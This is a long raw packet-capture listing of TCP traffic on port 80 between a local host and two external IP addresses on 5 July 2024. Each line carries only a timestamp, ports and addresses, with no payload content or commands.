                                                                Jul 5, 2024 04:25:27.281110048 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281121016 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281137943 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281147003 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281157970 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281167984 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281177998 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281183958 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.281213045 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.281233072 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281244040 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281270981 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.281332970 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.281338930 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281348944 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281359911 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281377077 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281388998 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281430960 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.281450987 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.281537056 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281547070 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281552076 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281557083 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281560898 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281565905 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281570911 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281575918 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281580925 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281585932 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281591892 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281653881 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.281661987 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.281718016 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.281718016 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.282248974 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.282286882 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.282303095 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.282546043 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292058945 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292119980 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292133093 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292162895 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292172909 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292191029 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292191982 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292207003 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292215109 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292217970 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292229891 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292242050 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292249918 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292295933 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292324066 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292335987 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292346001 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292357922 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292382002 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292417049 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292448044 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292458057 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292469978 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292485952 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292495012 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292512894 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292512894 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292548895 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292548895 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292763948 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292776108 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292810917 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292820930 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292836905 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292857885 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292867899 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292881966 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292896986 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292907953 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292918921 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.292980909 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.292980909 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.293031931 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.293534994 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293545961 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293561935 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293570995 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293616056 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293643951 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.293754101 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293765068 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293776035 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293785095 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293796062 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293822050 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.293838978 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293848991 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293859005 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293867111 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.293881893 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293895006 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293904066 CEST804990677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:27.293906927 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.293921947 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293931961 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.293963909 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.293963909 CEST4990680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:27.294002056 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.294007063 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.294013023 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.294028044 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.294039011 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.294049025 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.294054985 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.294136047 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.294198036 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.294209003 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.294219971 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.294230938 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.294243097 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.294255018 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.294265985 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.294269085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.294291973 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.294342041 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.297194004 CEST4990680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:27.297199965 CEST4990780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:27.297903061 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.298194885 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.303129911 CEST804990777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:27.303427935 CEST4990780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:27.303535938 CEST804990677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:27.303616047 CEST4990680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:27.303673983 CEST4990780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:27.308423996 CEST804990777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:27.353264093 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.353287935 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.353300095 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.353377104 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.353389025 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.353398085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.353409052 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.353410006 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.353458881 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.353458881 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.363544941 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363584995 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363596916 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363614082 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.363636017 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363708973 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363718987 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363734961 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.363761902 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363773108 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363782883 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363794088 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363810062 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363816023 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363820076 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.363835096 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.363852024 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363862991 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.363863945 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.363955975 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.374341965 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374351978 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374361992 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374435902 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374444962 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.374444962 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.374447107 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374459028 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374471903 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374483109 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374494076 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374505043 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.374511003 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374533892 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374536037 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.374536037 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.374560118 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.374588966 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374589920 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.374598980 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374609947 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374633074 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.374649048 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374659061 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374675989 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.374763966 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.374783993 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374794960 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374805927 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374825001 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.374861956 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.374942064 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374952078 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374962091 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374973059 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.374999046 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.375055075 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.375083923 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375093937 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375103951 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375113964 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375125885 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375149012 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.375154018 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375163078 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375174046 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375179052 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.375212908 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.375300884 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375345945 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.375358105 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375368118 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375397921 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375401974 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375406027 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.375521898 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.385724068 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385735035 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385745049 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385756016 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385819912 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.385842085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385853052 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385863066 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385886908 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385896921 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385905981 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385910034 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.385916948 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385930061 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385931969 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.385940075 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385951042 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385951042 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.385972977 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.385974884 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.385997057 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.386050940 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386054039 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.386115074 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.386141062 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386151075 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386198997 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386214972 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386226892 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386250973 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.386295080 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386305094 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.386307001 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386358023 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386368036 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386418104 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.386418104 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.386476994 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386487961 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386497974 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386507034 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386518955 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386529922 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386553049 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.386584997 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386614084 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.386645079 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386656046 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386678934 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386698961 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.386727095 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386738062 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386758089 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.386787891 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386796951 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386806011 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386817932 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386841059 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.386862993 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386874914 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386884928 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.386887074 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.386945963 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.387099028 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387109995 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387120008 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387190104 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387193918 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.387200117 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387211084 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387228966 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387239933 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387253046 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.387396097 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.387396097 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387489080 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387502909 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387514114 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387525082 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387536049 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.387538910 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.387558937 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.387619019 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.446144104 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.446154118 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.446161985 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.446177006 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.446187019 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.446197987 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.446208954 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.446252108 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.446285009 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.457382917 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457393885 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457403898 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457423925 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457437038 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457453966 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.457457066 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457468987 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457479954 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457493067 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.457503080 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.457509995 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457520008 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457530975 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.457534075 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457540989 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.457557917 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.457616091 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457624912 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.457632065 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457642078 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.457695007 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.457695961 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.468132019 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468142986 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468152046 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468169928 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.468183041 CEST804990385.28.47.30192.168.2.4
